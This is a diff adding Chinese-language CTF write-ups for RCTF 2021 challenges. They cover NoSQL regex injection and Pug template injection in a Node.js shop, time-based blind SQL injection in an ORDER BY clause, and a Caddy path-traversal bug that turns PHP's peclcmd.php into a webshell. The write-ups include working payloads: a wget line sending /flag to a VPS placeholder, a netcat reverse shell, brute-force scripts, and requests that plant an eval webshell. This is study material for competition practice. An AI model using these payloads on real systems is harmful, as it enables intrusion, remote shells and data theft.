--- a/RCTF 2021.md
+++ b/RCTF 2021.md
@@ -341,5 +341,357 @@ $app->route("POST /login",function(){
 
 ### 题目
 
+> **该题目原题与github上的题目代码略有出入**
+
+这道题是一道 `Nodejs`的题，进去是一个很简单的页面
+
+![ractf20211](img/rctf2021/rctf20211.png)
+
+代码如下
+
+```javascript
+//user.js
+router.post('/login', async (req, res) => {
+    let {username, password} = req.body
+    let rec = await db.Users.find({username: username, password: password})
+    if (rec) {
+        if (rec.username === username && rec.password === password) {
+            res.cookie('token', rec, {signed: true})
+            res.redirect('/shop')
+        } else {
+            res.render('login', {error: 'You Bad Bad >_<'})
+        }
+    } else {
+        res.render('login', {error: 'Login Failed!'})
+    }
+})
+
+router.post('/register', async (req, res) => {
+    let {username, password} = req.body
+    if (typeof(username) !== 'string')
+        return res.status(400)
+    let rec = await db.Users.find({username: username})
+    if (rec)
+        return res.render('register', {error: 'Duplicate User!'})
+    await db.Users.add(username, password, false)
+    return res.redirect('/user/login')
+})
+
+//db.js
+users.deleteMany(err => {
+    if (err) {
+        console.log(err)
+    } else {
+        users.insertOne({
+            username: 'rabbit',
+            password: process.env.PASSWORD,
+            active: true
+        })
+    }
+})
+```
+
+结合`db.js`和`user.js`，来看用户在注册时生成的用户都是不活跃的用户，即`active:false`，但是，在数据库里事先生成了一个`rabbit`用户，但是密码是纯随机的。但是该页面存在`nosql`注入，在`/login`路径下，我们可以爆破`rabbit`用户的密码
+
+```javascript
+// shop.js
+const checkLogin = (req, res, next) => {
+    if (req.signedCookies.token)
+        next()
+    else
+        res.render('error', {error: 'You must login!'})
+}
+
+const checkActive = (req, res, next) => {
+    if (req.signedCookies.token.active)
+        next()
+    else
+        res.render('error', {error: 'Your account is not active!'})
+}
+
+
+router.get('/', checkLogin, async (req, res) => {
+    let candies = await db.Candies.list()
+    res.render('shop', {candies: candies})
+})
+
+router.get('/order', checkLogin, checkActive, async (req, res) => {
+    let {id} = req.query
+    let candy = await db.Candies.find({id: id})
+    res.render('order', {user_name: req.signedCookies.token.username, candy: candy})
+})
+
+router.post('/order', checkLogin, checkActive, async (req, res) => {
+    let {user_name, candy_name, address} = req.body
+
+    res.render('confirm', {
+        user_name: user_name,
+        candy_name: candy_name,
+        address: pug.render(address)
+    })
+})
+```
+
+该页面主要处理登陆后面的逻辑，我们之前已经得到了`rabbit`用户，可以直接进入`/order`路径下，该逻辑会将`address`导入到`confirm.pug`这个页面
+
+```java
+extends layout
+
+
+block content
+    .container
+        .row.justify-content-center
+            .col-6.mt-5
+                .card
+                    .card-header.text-center.font-weight-bold(style='background-color: pink;color: white') Confirm Your Order
+                    .card-body
+                    form(action='/shop/confirm' method='POST')
+                        .form-group.row
+                            label.col-form-label.text-md-right.col-4(for='user_name') User Name
+                            .col-6
+                                input#user_name.form-control(type='text' name='user_name' value=user_name readonly)
+                        .form-group.row
+                            label.col-form-label.text-md-right.col-4(for='candy_name') Candy Name
+                            .col-6
+                                input#candy_name.form-control(type='text' name='candy_name' value=candy_name readonly)
+                        .form-group.row
+                            label.col-form-label.text-md-right.col-4(for='address') Address
+                            .col-6
+                                input#address.form-control(type='text' name='address' value='123' readonly)
+                                #{console.log(global.process.mainModule.require("child_process").execSync("wget -q -O- VPS_IP/`cat /flag`").toString())}
+                                //input#address.form-control(type='text' name='address' value='123')
+                        if error
+                            .alert.alert-danger.mx-5(role='alert') #{error}
+                    .row.justify-content-center
+                        .col-6
+                            a(href='/shop/thanks')
+                                button.btn.btn-primary.btn-block(type='submit') Yes
+                        .col-6
+                            a(href='/shop')
+                                button.btn.btn-primary.btn-block No
+```
+
+而在这个页面下存在着`pug`模板注入，需要注意的是`github`的代码和比赛环境差距就在`address`变量，一个是字符型，一个是变量，要注意
+
+### payload
+
+```python
+import requests
+import time
+import string
+
+url = "http://127.0.0.1:3000/user/login"
+password = ""
+#charset = string.ascii_letters + string.punctuation
+charset = string.printable
+
+for i in range(64):
+    for s in charset:
+        data = {
+            "username": "rabbit",
+            "password[$regex]": f"^{re.escape(password + s)}"
+        }
+        #print(s)
+        res = requests.post(url, data)
+        if "You Bad Bad" in res.text:
+            password += s
+            print(password)
+            break
+```
+
+```
+user_name=rabbit&candy_name=bunny_candy&address=123 readonly)%0a                                #{console.log(global.process.mainModule.require("child_process").execSync("nc 192.168.232.1 9999 -e /bin/sh").toString('UTF-8'))}%0a                                input#address.form-control(type='text' name='address' value='123')
+```
+
+## EasySQLi
+
+>  *2021/10/20*
+
+### 题目
+
+这道题给了源代码
+
+```php
+<?php
+require_once('db.php');
+highlight_file(__FILE__);
+
+set_time_limit(1);
+$s = floatval(microtime());
+
+$order = $_GET['order'] ?? 1;
+$sql = "SELECT CONCAT('RCTF{',USER(),'}') AS FLAG WHERE '🍬关注嘉然🍬' = '🍬顿顿解馋🍬' OR '🍬Watch Diana a day🍬' = '🍬Keep hunger away🍬' OR '🍬嘉然に注目して🍬' = '🍬食欲をそそる🍬' ORDER BY $order;";
+
+$stm = $pdo->prepare($sql);
+$stm->execute();
+echo "Count {$stm->rowCount()}.";
+
+usleep((1 + floatval(microtime()) - $s) * 1e6);
+```
+
+`set_time_limit`函数会限制页面执行时间在1s，后面的`usleep`会让页面稳定延迟在1s，`SQL`语句用了预编译，但是参数却是在`order by`后面，所以根本没影响，还是可以注入.
+
+而`set_time_limit`函数有这样的限制
+
+> *Note:
+> The set_time_limit() function and the configuration directive max_execution_time only affect the execution time of the script itself. Any time spent on activity that happens outside the execution of the script such as system calls using system(), stream operations, database queries, etc. is not included when determining the maximum time that the script has been running. This is not true on Windows where the measured time is real.*
+
+也就是说SQL本身的延时并不在这个计时范围内，所以我们需要让`SQL`语句也延时，才能攻击成功，但是常规的`sleep`会被优化掉，需要让`SQL`做一些耗时间的工作，达到延迟的效果
+
+#### `repeat`
+
+```sql
+SELECT
+    CONCAT( 'RCTF{', USER (), '}' ) AS FLAG 
+WHERE
+    '🍬关注嘉然🍬' = '🍬顿顿解馋🍬' OR '🍬Watch Diana a day🍬' = '🍬Keep hunger away🍬' OR '🍬嘉然に注目して🍬' = '🍬食欲をそそる🍬' 
+ORDER BY
+(
+    updatexml (1,
+        IF(
+            ASCII(SUBSTR((SELECT USER()), 1, 1 )) = 65,
+            CONCAT(REPEAT('a', 40000000), REPEAT('a', 40000000), REPEAT('a', 40000000), REPEAT('a', 40000000), REPEAT('b', 10000000)),
+            1
+        ),
+        1
+    ) 
+)
+```
+
+#### `hex`
+
+```sql
+SELECT
+    CONCAT( 'RCTF{', USER (), '}' ) AS FLAG 
+WHERE
+    '🍬关注嘉然🍬' = '🍬顿顿解馋🍬' OR '🍬Watch Diana a day🍬' = '🍬Keep hunger away🍬' OR '🍬嘉然に注目して🍬' = '🍬食欲をそそる🍬' 
+ORDER BY
+(
+    updatexml (1,
+        concat(
+            '~',
+            (
+                if(
+                    (substr(hex(user()), 1, 1)='A'),
+                    (select length(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex('1')))))))))))))))))))))))))))))))),
+                    'a'
+                )
+            ),
+            1
+        ),
+        1
+    )
+)
+```
+
+#### `redos`
+
+```sql
+SELECT
+    CONCAT( 'RCTF{', USER (), '}' ) AS FLAG 
+WHERE
+    '🍬关注嘉然🍬' = '🍬顿顿解馋🍬' OR '🍬Watch Diana a day🍬' = '🍬Keep hunger away🍬' OR '🍬嘉然に注目して🍬' = '🍬食欲をそそる🍬' 
+ORDER BY
+(
+    SELECT 1 WHERE
+        IF(
+            ASCII(SUBSTR(USER(), 1, 1 )) = 65,
+            REPEAT('a', 100),
+            'a'
+        )
+        RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b' 
+)
+```
+
+### payload
+
+```python
+# -*- coding:utf8 -*-
+import requests
+import string
+
+flag = ''
+select = 'select/**/user()'
+url = "http://127.0.0.1:11002/?order="
+for j in range(1, 66):
+    for i in string.printable:
+        #payload="updatexml(1,if(substr(({}),{},1)='{}',repeat('a',40000000),0),1)".format(select, j, i)
+        payload = "updatexml(1,if(ascii(substr(({}),{},1))='{}',concat(repeat('a',40000000),repeat('a',40000000),repeat('a',40000000),repeat('a',40000000),repeat('b',10000000)),1),1)".format(select, j, ord(i))
+        url1 = url + payload
+        req = requests.get(url1)
+        #print(req.elapsed.total_seconds())
+        #print(payload)
+        if req.elapsed.total_seconds() > 1.4:
+            flag += i
+            print(payload)
+            print(flag)
+```
+
+## VerySafe
+
+> *2021/10/20*
+
+### 题目
+
+这道题的`caddy`和`Nginx`很相似，这里什么都没给，只有一个空白页面，服务器为`caddy`，将服务都反向代理到`php fpm`上
+
+```php
+:80 {
+	root * /srv
+	php_fastcgi php:9000
+}
+```
+
+因为什么都没给，所以首先只能对`caddy`的历史漏洞进行搜查，该版本为`2.4.2`，从`github`上可以查到，`Caddy <= 2.4.2` 在传递`script_path`给`php-fpm`的时候可以目录穿越，而这道题的另外一个考点就是 [**利用php自带文件进行RCE**](https://web.archive.org/web/20201022203937/https://khack40.info/camp-ctf-2015-trolol-web-write-up/)
+
+> *在php官方提供的php容器中 register_argc_argv 是默认开启的，而且也默认包含peclcmd.php，于是就可以在默认php-fpm的docker和caddy<=2.4.2的环境下无条件RCE*
+
+### payload
+
+```http
+GET /../usr/local/lib/php/peclcmd.php?+config-create+/tmp/<?=eval($_POST['cmd']);?>/*+/srv/bme.php HTTP/1.1
+Host: 127.0.0.1:54120
+sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+```http
+POST /bme.php HTTP/1.1
+Host: 127.0.0.1:54120
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 24
+
+cmd=system('/readflag');
+```
+
+## xss_it
+
+### 题目
+
 ### payload
 
